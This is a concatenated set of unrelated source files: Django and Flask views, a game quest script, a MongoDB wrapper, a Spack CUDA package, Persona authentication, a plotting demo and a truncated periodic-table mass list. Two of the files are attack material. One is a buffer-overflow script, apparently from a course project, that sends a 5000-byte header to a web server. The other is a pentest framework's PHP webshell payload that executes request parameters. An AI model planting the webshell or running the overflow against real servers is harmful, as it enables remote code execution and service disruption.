def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
| openaid-IATI/OIPA | OIPA/api/generics/views.py | Python | agpl-3.0 | 6,974 | 0.000143 |
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + \
"Evil: {evil}\r\n" + \
"Host: birk105.studby.uio.no:81\r\n\r\n"
# 536 is first address that causes the server to not return a valid response
req = req.replace("{evil}","".join(['a' for i in xrange(5000)]))
return req
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| nmahlangu/cs263-project-one | exploit-2c.py | Python | mit | 1,279 | 0.016419 |
# Rewritten by RayzoR
import sys
from com.l2scoria.gameserver.model.quest import State
from com.l2scoria.gameserver.model.quest import QuestState
from com.l2scoria.gameserver.model.quest.jython import QuestJython as JQuest
qn = "269_InventionAmbition"
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.questItemIds = [10866]
def onEvent (self,event,st) :
htmltext = event
if event == "32486-03.htm" :
st.set("cond","1")
st.setState(STARTED)
st.playSound("ItemSound.quest_accept")
elif event == "32486-05.htm" :
st.exitQuest(1)
st.playSound("ItemSound.quest_finish")
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
EnergyOres = st.getQuestItemsCount(10866)
if id == CREATED :
if player.getLevel() < 18 :
htmltext = "32486-00.htm"
st.exitQuest(1)
else :
htmltext = "32486-01.htm"
elif EnergyOres > 0:
htmltext = "32486-07.htm"
bonus = 0
if EnergyOres >= 20:
bonus = 2044
st.giveItems(57,EnergyOres*50+bonus)
st.takeItems(10866,-1)
else :
htmltext = "32486-04.htm"
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
if st.getRandom(10)<6 :
st.giveItems(10866,1)
st.playSound("ItemSound.quest_itemget")
return
QUEST = Quest(269,qn,"Invention Ambition")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(32486)
QUEST.addTalkId(32486)
for mob in range(21124,21132) :
QUEST.addKillId(mob)
| zenn1989/scoria-interlude | L2Jscoria-Game/data/scripts/quests/269_InventionAmbition/__init__.py | Python | gpl-3.0 | 2,003 | 0.044433 |
#author: fyth
from webshell import *
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
| jiangzhw/Beebeeto-framework | utils/payload/webshell/php.py | Python | gpl-2.0 | 400 | 0.005 |
from __future__ import absolute_import
import re, os, sys
from clay import app
import clay.config
from flask import make_response, request, redirect, render_template, url_for
from epubber.fimfic_epubgen import FimFictionEPubGenerator
site_epub_classes = [
FimFictionEPubGenerator
]
accesslog = clay.config.get_logger('epubber_access')
#####################################################################
# Main App Views Section
#####################################################################
@app.route('/', methods=['GET', 'POST'])
def main_view():
story = request.args.get("story") or None
if story:
data = None
for epgenclass in site_epub_classes:
epgen = epgenclass()
if epgen.handle_url(story):
epub_file, data = epgen.gen_epub()
accesslog.info('%(title)s - %(url)s' % epgen.metas)
del epgen
response = make_response(data)
response.headers["Content-Type"] = "application/epub+zip"
response.headers["Content-Disposition"] = "attachment; filename=%s" % epub_file
return response
del epgen
return ("Cannot generate epub for this URL.", 400)
return render_template("main.html")
#####################################################################
# Secondary Views Section
#####################################################################
@app.route('/health', methods=['GET'])
def health_view():
'''
Heartbeat view, because why not?
'''
return ('OK', 200)
#####################################################################
# URL Shortener Views Section
#####################################################################
@app.route('/img/<path>', methods=['GET', 'POST'])
def static_img_proxy_view(path):
'''
Make shorter URLs for image files.
'''
path = re.sub(r'[^A-Za-z0-9_.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('img', path)))
@app.route('/js/<path>', methods=['GET', 'POST'])
def static_js_proxy_view(path):
'''
Make shorter URLs for javascript files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('js', path)))
@app.route('/css/<path>', methods=['GET', 'POST'])
def static_css_proxy_view(path):
'''
Make shorter URLs for CSS files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('css', path)))
#####################################################################
# Main
#####################################################################
def main():
# Make templates copacetic with UTF8
reload(sys)
sys.setdefaultencoding('utf-8')
# App Config
app.secret_key = clay.config.get('flask.secret_key')
main()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 nowrap
| revarbat/epubber | epubber/views/main.py | Python | bsd-2-clause | 2,968 | 0.003706 |
from django.apps import AppConfig
class PatronsConfig(AppConfig):
name = 'patrons'
| PrayAndGrow/server | patrons/apps.py | Python | lgpl-3.0 | 89 | 0 |
import pymongo
from pymongo.objectid import ObjectId
import pymongo.cursor
class MongoWrapper:
def __init__ (self, cursor, model = None):
if model:
if not cursor['public']:
if not auth.user.id == cursor['owner']:
raise HTTP (401)
self.__dict__['cursor'] = cursor
self.__dict__['model'] = model
def __getattr__ (self, key):
try:
return getattr (self.cursor, key)
except AttributeError:
try:
val = self.cursor[unicode (key)]
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (self.cursor[unicode (key)], self.model)
else:
return val
except KeyError:
return None
def __nonzero__ (self):
if self.cursor is None:
return False
return len (self.cursor) != 0
def __iter__ (self):
return MongoWrapperIter (self.cursor, self.model)
def public (self):
result = {}
result['id'] = str (self.cursor['_id'])
result['tags'] = self.cursor['tags']
for key in self.model.public ():
if self.cursor.has_key (key.name):
result[key.name] = self.cursor[key.name]
else:
result[key.name] = None
return result
def json (self):
return json.dumps (self.public ())
class MongoCursorWrapper:
def __init__ (self, cursor, model = None):
self.__cursor = cursor
self.model = model
def first (self):
if self.__cursor.count () > 0:
return self[0]
else:
return None
def __getattr__ (self, key):
return getattr (self.__cursor, key)
def __getitem__ (self, index):
record = self.__cursor[index]
if self.model:
if not record['public']:
if not auth.user.id == record['owner']:
raise HTTP (401)
return MongoWrapper (record, self.model)
def json (self):
result = []
for item in self:
result.append (item.public ())
return json.dumps (result)
def __len__ (self):
return self.__cursor.count ()
def __iter__ (self):
return MongoWrapperIter (self.__cursor, self.model)
class MongoWrapperIter:
def __init__ (self, cursor, model):
self.__cursor = iter (cursor)
self.model = model
def __iter__ (self):
return self
def next (self):
val = self.__cursor.next ()
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (val, self.model)
else:
return val
class MongoCollectionWrapper:
def __init__ (self, name, model):
self.name = name
self.model = model
def authorized (self, record):
if not record['public']:
if not auth.user.id == record['owner']:
raise RuntimeError ()
def __getattr__ (self, key):
def action (*args, **kw):
data = getattr (mongo[self.name], key) (*args, **kw)
if type (data) == pymongo.cursor.Cursor:
return MongoCursorWrapper (data, self.model)
elif type (data) == dict:
return MongoWrapper (data, self.model)
else:
return data
return action
class DataManager:
def __init__ (self):
self.collections = {}
self.models = {}
def user (self):
user = mongo.users.find_one ({'user_id': auth.user.id})
if not user:
user = {'user_id': auth.user.id}
mongo.users.insert (user)
#print 'creating user'
return user
def define_datatype (self, datatype, model):
self.models[datatype] = model
self.collections[datatype] = MongoCollectionWrapper (datatype, model)
def insert (self, datatype, **kw):
kw['owner'] = auth.user.id
if not kw.has_key ('tags'):
kw['tags'] = []
if not kw.has_key ('public'):
kw['public'] = False
return self.collections[datatype].insert (kw)
def count (self, datatype):
return self.collections[datatype].count ()
def update (self, datatype, entry_id, **kw):
self.collections[datatype].update ({'_id': ObjectId (entry_id)}, {'$set': kw})
def global_load (self, datatype, kw = None):
if not kw:
data = self.collections[datatype].find ({
'public': True
})
else:
query = []
for kw_regex in kw:
query.append ({'name': {'$regex': kw_regex, '$options': 'i'}})
query.append ({'tags': {'$regex': kw_regex, '$options': 'i'}})
data = self.collections[datatype].find ({
'public': True,
'$or': query
})
return data
def local_load (self, datatype, keywords = None):
user = dm.user ()
if not user.has_key (datatype):
user[datatype] = []
mongo.users.update ({'_id': user['_id']}, {'$set': {datatype: []}})
ids = user[datatype]
#data = mongo[datatype].find ({'_id': {'$in': ids}})
data = self.collections[datatype].find ({'_id': {'$in': map (lambda x: ObjectId (x), ids)}})
return data
def load_keyworded (self, datatype, kw):
return self.collections[datatype].find ({'tags': {'$in': kw}})
def get (self, datatype, object_id):
return self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def query (self, datatype, **query):
return self.collections[datatype].find (query)
def owner (self, datatype, object_id):
data = self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def public (self, datatype, object_id, pub_status):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$set': {'public': pub_status}})
def link (self, datatype, object_id):
dm.user ()
mongo.users.update ({'user_id': auth.user.id}, {'$push': {datatype: ObjectId (object_id)}})
#print dm.user ()
def unlink (self, datatype, object_id):
mongo.users.update ({'user_id': auth.user.id}, {'$pull': {datatype: ObjectId (object_id)}})
def delete (self, datatype, **kw):
self.collections[datatype].remove (kw)
def dup (self, datatype, alt_datatype):
self.models[alt_datatype] = self.models[datatype]
self.collections[alt_datatype] = self.collections[datatype]
def get_types (self):
return self.models
def tag (self, datatype, object_id, kw):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$pushAll': {'tags': kw}})
#def __ensure_user (self, user_id):
# if not mongo.users.find_one ({'user_id': user_id}):
# mongo.users.insert ({'user_id': user_id})
#def __ensure_type (self, user_id, datatype):
# if not mongo.users.find_one ({'user_id': user_id,
# datatype: {'$exists': true}
# }):
# mongo.users.update ({'user_id': user_id}, {datatype: []})
def boolean (val):
if isinstance (val, str):
lower = val.lower ()
if lower == 'false':
return False
elif lower == 'f':
return False
elif lower == 'true':
return True
elif lower == 't':
return True
elif isinstance (val, int):
if val == 0:
return False
elif val == 1:
return True
elif isinstance (val, float):
if val == 0.0:
return False
elif val == 1.0:
return True
else:
if val is None:
return False
raise RuntimeError ('Cast to boolean failed: Could not convert ' +
str (val) + ' to a boolean')
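# e.g. boolean ('t') -> True, boolean ('FALSE') -> False,
# boolean (1) -> True, boolean (None) -> False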
def cond_assign (dst, src, key):
if src.has_key (key):
dst[key] = src[key]
class attr_dict (dict):
def __init__ (self, **attr):
dict.__init__ (self, **attr)
def __getattr__ (self, key):
try:
return self[key]
except KeyError:
return None
def default (self, key, default):
if self.has_key (key):
return
else:
self[key] = default
def json (self):
return json.dumps (self)
class DM_Field (attr_dict):
def __init__ (self, name, field_type, **attr):
self.name = name
self.type = field_type
self.lookup_id = 'f_' + self.name
attr_dict.__init__ (self, **attr)
#def __deepcopy__ (self, memo):
# pass
def toField (self):
if self.type == 'table':
return Field (self.lookup_id, 'string', default = None)
kw = {}
cond_assign (kw, self, 'default')
cond_assign (kw, self, 'required')
return Field (self.lookup_id, self.type, **kw)
def display (self):
kw = {}
cond_assign (kw, self, 'title')
cond_assign (kw, self, 'visible')
cond_assign (kw, self, 'text')
if not kw.has_key ('text'):
kw['text'] = self.name
return kw
class DM_TableModel (dict):
def __init__ (self, *fields, **kw):
if kw.has_key ('name'):
self.name = kw['name']
else:
self.name = None
values = []
self.publicList = []
for item in fields:
values.append ((item.name, item))
if not item.private and not item.protected:
self.publicList.append (item)
dict.__init__ (self, values)
def map_key (self, key):
return 'f_' + key
def __deepcopy__ (self, memo):
return DM_TableModel (*self, name = self.name)
def __iter__ (self):
return iter (self.values ())
def append (self, field):
self[field.name] = field
def toFields (self):
return map (lambda item: item.toField (), self.values ())
def public (self):
return self.publicList
dm = DataManager ()
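# A minimal usage sketch (illustrative; 'notes' is a hypothetical datatype and
# this assumes a web2py request context where auth.user is set):
#
#     dm.define_datatype ('notes', DM_TableModel (
#         DM_Field ('name', 'string'),
#         DM_Field ('body', 'text'),
#         name = 'notes'))
#     note_id = dm.insert ('notes', name = 'First note', tags = ['demo'])
#     record = dm.get ('notes', note_id)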
| dotskapes/dotSkapes | models/003_data_manager.py | Python | mit | 10,267 | 0.019382 |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
version('9.2.88', 'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
| tmerrick1/spack | var/spack/repos/builtin/packages/cuda/package.py | Python | lgpl-2.1 | 3,901 | 0.001794 |
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
logging.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
logging.warning('got response from persona')
logging.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
email = response.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
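# Wiring sketch (an assumption; the actual project settings may differ):
#
#     AUTHENTICATION_BACKENDS = (
#         'accounts.authentication.PersonaAuthenticationBackend',
#     )
#     DOMAIN = 'localhost'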
| thomec/tango | accounts/authentication.py | Python | gpl-2.0 | 1,296 | 0.003086 |
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(4)
y = x
t = [1.0,0.9,0.95,1.05]
s = np.array([1.0,0.9,0.95,1.05])*100
plt.scatter(x, y, c=t, s=s, alpha = 0.5)
plt.colorbar()
plt.show()
| jmmauricio/pypstools | dev/colormaps.py | Python | gpl-3.0 | 214 | 0.037383 |
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .fields import HexIntegerField
from .managers import APNSDeviceManager, GCMDeviceManager
try:
instapush_settings = settings.INSTAPUSH_SETTINGS
except AttributeError:
raise ImproperlyConfigured("Please include instapush settings dictionary "\
"in your django settings")
class BaseDevice(models.Model):
"""
Represents a base device object. This class defines
the generic fields to be used by all device types.
All other device types should inherit from this.
"""
name = models.CharField(_('name'), max_length=255, blank=True, null=True)
active = models.BooleanField(_('active'), default=True)
## as a device can not only be related to a user
## but any other defined models. we let the push
## user decide which model should be the owner
## of a device object. For cases, where a device
## does not have to be related to any model this
## can be left empty and hence blank and null are
## set to True
owner = models.ForeignKey(instapush_settings.get('DEVICE_OWNER_MODEL'),
blank=True, null=True)
created = models.DateTimeField(_('created'), auto_now_add=True)
updated = models.DateTimeField(_('updated'), auto_now=True)
class Meta:
abstract = True
def __unicode__(self):
return self.name or self.device_id or self.registration_id
class GCMDevice(BaseDevice):
"""
Represents an android device
"""
device_id = HexIntegerField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.TextField(_('Registration ID'))
## Set custom manager
objects = GCMDeviceManager()
class Meta:
verbose_name = _('GCM Device')
verbose_name_plural = _('GCM Devices')
def send_message(self, message, **kwargs):
"""
Sends a push notification to this device via GCM
"""
from ..libs.gcm import gcm_send_message
data = kwargs.pop("extra", {})
if message is not None:
data["message"] = message
return gcm_send_message(registration_id=self.registration_id,
data=data, **kwargs)
class APNSDevice(BaseDevice):
"""
Represents an iOS device
"""
    device_id = models.UUIDField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.CharField(_('Registration ID'), max_length=64,
unique=True)
    ## Set custom manager
    objects = APNSDeviceManager()
class Meta:
verbose_name = _('APNS Device')
verbose_name_plural = _('APNS Devices')
def send_message(self, message, **kwargs):
from ..libs.apns import apns_send_message
return apns_send_message(registration_id=self.registration_id,
alert=message, **kwargs)
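# A minimal usage sketch (illustrative; the registration id is a placeholder):
#
#     device = GCMDevice.objects.create(registration_id='<gcm-token>')
#     device.send_message('Hello', extra={'badge': 1})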
| amyth/django-instapush | instapush/models/base.py | Python | mit | 2,928 | 0.006489 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Elemental masses (most common isotope), symbols, and atomic numbers from psi4.
"""
_temp_element = ["GHOST", "HYDROGEN", "HELIUM", "LITHIUM", "BERYLLIUM",
"BORON", "CARBON", "NITROGEN", "OXYGEN", "FLUORINE",
"NEON", "SODIUM", "MAGNESIUM", "ALUMINUM", "SILICON",
"PHOSPHORUS", "SULFUR", "CHLORINE", "ARGON", "POTASSIUM",
"CALCIUM", "SCANDIUM", "TITANIUM", "VANADIUM", "CHROMIUM",
"MANGANESE", "IRON", "COBALT", "NICKEL", "COPPER",
"ZINC", "GALLIUM", "GERMANIUM", "ARSENIC", "SELENIUM",
"BROMINE", "KRYPTON", "RUBIDIUM", "STRONTIUM", "YTTRIUM",
"ZIRCONIUM", "NIOBIUM", "MOLYBDENUM", "TECHNETIUM", "RUTHENIUM",
"RHODIUM", "PALLADIUM", "SILVER", "CADMIUM", "INDIUM",
"TIN", "ANTIMONY", "TELLURIUM", "IODINE", "XENON",
"CESIUM", "BARIUM", "LANTHANUM", "CERIUM", "PRASEODYMIUM",
"NEODYMIUM", "PROMETHIUM", "SAMARIUM", "EUROPIUM", "GADOLINIUM",
"TERBIUM", "DYSPROSIUM", "HOLMIUM", "ERBIUM", "THULIUM",
"YTTERBIUM", "LUTETIUM", "HAFNIUM", "TANTALUM", "TUNGSTEN",
"RHENIUM", "OSMIUM", "IRIDIUM", "PLATINUM", "GOLD",
"MERCURY", "THALLIUM", "LEAD", "BISMUTH", "POLONIUM",
"ASTATINE", "RADON", "FRANCIUM", "RADIUM", "ACTINIUM",
"THORIUM", "PROTACTINIUM", "URANIUM", "NEPTUNIUM", "PLUTONIUM",
"AMERICIUM", "CURIUM", "BERKELIUM", "CALIFORNIUM", "EINSTEINIUM",
"FERMIUM", "MENDELEVIUM", "NOBELIUM", "LAWRENCIUM" "RUTHERFORDIUM",
"DUBNIUM", "SEABORGIUM", "BOHRIUM"]
_temp_symbol = ["X", "H", "HE", "LI", "BE", "B", "C", "N", "O", "F", "NE", "NA", "MG",
"AL", "SI", "P", "S", "CL", "AR", "K", "CA", "SC", "TI", "V", "CR", "MN", "FE", "CO",
"NI", "CU", "ZN", "GA", "GE", "AS", "SE", "BR", "KR", "RB", "SR", "Y", "ZR", "NB",
"MO", "TC", "RU", "RH", "PD", "AG", "CD", "IN", "SN", "SB", "TE", "I", "XE", "CS",
"BA", "LA", "CE", "PR", "ND", "PM", "SM", "EU", "GD", "TB", "DY", "HO", "ER", "TM",
"YB", "LU", "HF", "TA", "W", "RE", "OS", "IR", "PT", "AU", "HG", "TL", "PB", "BI",
"PO", "AT", "RN", "FR", "RA", "AC", "TH", "PA", "U", "NP", "PU", "AM", "CM", "BK",
"CF", "ES", "FM", "MD", "NO", "LR", "RF", "DB", "SG", "BH", "HS", "MT", "DS", "RG",
"UUB", "UUT", "UUQ", "UUP", "UUH", "UUS", "UUO"]
_temp_z = list(range(0, 108))
_temp_mass = [
0., 1.00782503207, 4.00260325415, 7.016004548, 9.012182201, 11.009305406,
12, 14.00307400478, 15.99491461956, 18.998403224, 19.99244017542,
22.98976928087, 23.985041699, 26.981538627, 27.97692653246, 30.973761629,
31.972070999, 34.968852682, 39.96238312251, 38.963706679, 39.962590983,
44.955911909, 47.947946281, 50.943959507, 51.940507472, 54.938045141,
55.934937475, 58.933195048, 57.935342907, 62.929597474, 63.929142222,
68.925573587, 73.921177767, 74.921596478, 79.916521271, 78.918337087,
85.910610729, 84.911789737, 87.905612124, 88.905848295, 89.904704416,
92.906378058, 97.905408169, 98.906254747, 101.904349312, 102.905504292,
105.903485715, 106.90509682, 113.90335854, 114.903878484, 119.902194676,
120.903815686, 129.906224399, 126.904472681, 131.904153457, 132.905451932,
137.905247237, 138.906353267, 139.905438706, 140.907652769, 141.907723297,
144.912749023, 151.919732425, 152.921230339, 157.924103912, 158.925346757,
163.929174751, 164.93032207, 165.930293061, 168.93421325, 173.938862089,
174.940771819, 179.946549953, 180.947995763, 183.950931188, 186.955753109,
191.96148069, 192.96292643, 194.964791134, 196.966568662, 201.970643011,
204.974427541, 207.976652071, 208.980398734, 208.982430435, 210.987496271,
222.017577738, 222.01755173, 228.031070292, 227.027752127, 232.038055325,
231.03588399, 238.050788247, 237.048173444, 242.058742611, 243.06138108,
247.07035354, 247.07030708, 251.079586788, 252.082978512, 257.095104724,
258.098431319, 255.093241131, 260.105504, 263.112547, 255.107398, 259.114500,
262.122892, 263.128558, 265.136151, 281.162061, 272.153615, 283.171792, 283.176451,
285.183698, 287.191186, 292.199786, 291.206564, 293.214670]
_temp_iso_symbol = [
"H", "H1", "H2", "D", "H3", "T", "H4", "H5", "H6", "H7", "HE", "HE3", "HE4",
"HE5", "HE6", "HE7", "HE8", "HE9", "HE10", "LI", "LI3", "LI4", "LI5", "LI6",
"LI7", "LI8", "LI9", "LI10", "LI11", "LI12", "BE", "BE5", "BE6", "BE7", "BE8",
"BE9", "BE10", "BE11", "BE12", "BE13", "BE14", "BE15", "BE16", "B", "B6", "B7",
"B8", "B9", "B10", "B11", "B12", "B13", "B14", "B15", "B16", "B17", "B18", "B19",
"C", "C8", "C9", "C10", "C11", "C12", "C13", "C14", "C15", "C16", "C17", "C18",
"C19", "C20", "C21", "C22", "N", "N10", "N11", "N12", "N13", "N14", "N15", "N16",
"N17", "N18", "N19", "N20", "N21", "N22", "N23", "N24", "N25", "O", "O12", "O13",
"O14", "O15", "O16", "O17", "O18", "O19", "O20", "O21", "O22", "O23", "O24",
"O25", "O26", "O27", "O28", "F", "F14", "F15", "F16", "F17", "F18", "F19", "F20",
"F21", "F22", "F23", "F24", "F25", "F26", "F27", "F28", "F29", "F30", "F31",
"NE", "NE16", "NE17", "NE18", "NE19", "NE20", "NE21", "NE22", "NE23", "NE24",
"NE25", "NE26", "NE27", "NE28", "NE29", "NE30", "NE31", "NE32", "NE33", "NE34",
"NA", "NA18", "NA19", "NA20", "NA21", "NA22", "NA23", "NA24", "NA25", "NA26",
"NA27", "NA28", "NA29", "NA30", "NA31", "NA32", "NA33", "NA34", "NA35", "NA36",
"NA37", "MG", "MG19", "MG20", "MG21", "MG22", "MG23", "MG24", "MG25", "MG26",
"MG27", "MG28", "MG29", "MG30", "MG31", "MG32", "MG33", "MG34", "MG35", "MG36",
"MG37", "MG38", "MG39", "MG40", "AL", "AL21", "AL22", "AL23", "AL24", "AL25",
"AL26", "AL27", "AL28", "AL29", "AL30", "AL31", "AL32", "AL33", "AL34", "AL35",
"AL36", "AL37", "AL38", "AL39", "AL40", "AL41", "AL42", "SI", "SI22", "SI23",
"SI24", "SI25", "SI26", "SI27", "SI28", "SI29", "SI30", "SI31", "SI32", "SI33",
"SI34", "SI35", "SI36", "SI37", "SI38", "SI39", "SI40", "SI41", "SI42", "SI43",
"SI44", "P", "P24", "P25", "P26", "P27", "P28", "P29", "P30", "P31", "P32",
"P33", "P34", "P35", "P36", "P37", "P38", "P39", "P40", "P41", "P42", "P43",
"P44", "P45", "P46", "S", "S26", "S27", "S28", "S29", "S30", "S31", "S32", "S33",
"S34", "S35", "S36", "S37", "S38", "S39", "S40", "S41", "S42", "S43", "S44",
"S45", "S46", "S47", "S48", "S49", "CL", "CL28", "CL29", "CL30", "CL31", "CL32",
"CL33", "CL34", "CL35", "CL36", "CL37", "CL38", "CL39", "CL40", "CL41", "CL42",
"CL43", "CL44", "CL45", "CL46", "CL47", "CL48", "CL49", "CL50", "CL51", "AR",
"AR30", "AR31", "AR32", "AR33", "AR34", "AR35", "AR36", "AR37", "AR38", "AR39",
"AR40", "AR41", "AR42", "AR43", "AR44", "AR45", "AR46", "AR47", "AR48", "AR49",
"AR50", "AR51", "AR52", "AR53", "K", "K32", "K33", "K34", "K35", "K36", "K37",
"K38", "K39", "K40", "K41", "K42", "K43", "K44", "K45", "K46", "K47", "K48",
"K49", "K50", "K51", "K52", "K53", "K54", "K55", "CA", "CA34", "CA35", "CA36",
"CA37", "CA38", "CA39", "CA40", "CA41", "CA42", "CA43", "CA44", "CA45", "CA46",
"CA47", "CA48", "CA49", "CA50", "CA51", "CA52", "CA53", "CA54", "CA55", "CA56",
"CA57", "SC", "SC36", "SC37", "SC38", "SC39", "SC40", "SC41", "SC42", "SC43",
"SC44", "SC45", "SC46", "SC47", "SC48", "SC49", "SC50", "SC51", "SC52", "SC53",
"SC54", "SC55", "SC56", "SC57", "SC58", "SC59", "SC60", "TI", "TI38", "TI39",
"TI40", "TI41", "TI42", "TI43", "TI44", "TI45", "TI46", "TI47", "TI48", "TI49",
"TI50", "TI51", "TI52", "TI53", "TI54", "TI55", "TI56", "TI57", "TI58", "TI59",
"TI60", "TI61", "TI62", "TI63", "V", "V40", "V41", "V42", "V43", "V44", "V45",
"V46", "V47", "V48", "V49", "V50", "V51", "V52", "V53", "V54", "V55", "V56",
"V57", "V58", "V59", "V60", "V61", "V62", "V63", "V64", "V65", "CR", "CR42",
"CR43", "CR44", "CR45", "CR46", "CR47", "CR48", "CR49", "CR50", "CR51", "CR52",
